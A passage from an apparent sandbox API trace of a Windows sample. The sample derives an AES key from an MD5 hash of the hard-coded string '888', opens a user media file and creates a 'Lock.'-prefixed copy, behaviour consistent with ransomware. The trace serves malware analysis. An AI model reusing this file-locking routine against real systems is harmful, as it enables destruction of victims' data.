hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.592] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.592] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0122.592] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0122.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0122.593] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.593] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.593] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf550) returned 1 [0122.594] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.594] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.594] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.595] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.595] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.595] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa300, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.595] CryptCreateHash (in: hProv=0x9bf550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.595] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ba8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.595] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.595] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa2b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.595] CryptHashData (hHash=0x9a4a40, pbData=0x2a71ce8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0122.595] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.595] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.596] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.596] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa330, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.596] CryptDeriveKey (in: hProv=0x9bf550, Algid=0x6601, hBaseData=0x9a4a40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4900) returned 1 [0122.596] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.596] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.596] CryptDestroyHash (hHash=0x9a4a40) returned 1 [0122.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/fM4.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fm4.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0122.597] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.597] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0122.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.598] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0122.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0122.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0122.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0122.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.fM4.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.fm4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0122.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0122.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.605] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0122.605] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0122.605] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.605] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd6020 [0122.609] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0122.609] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x7ba2, lpOverlapped=0x0) returned 1 [0122.610] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0122.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7ba2) returned 0x2a9a140 [0122.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd6020 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: 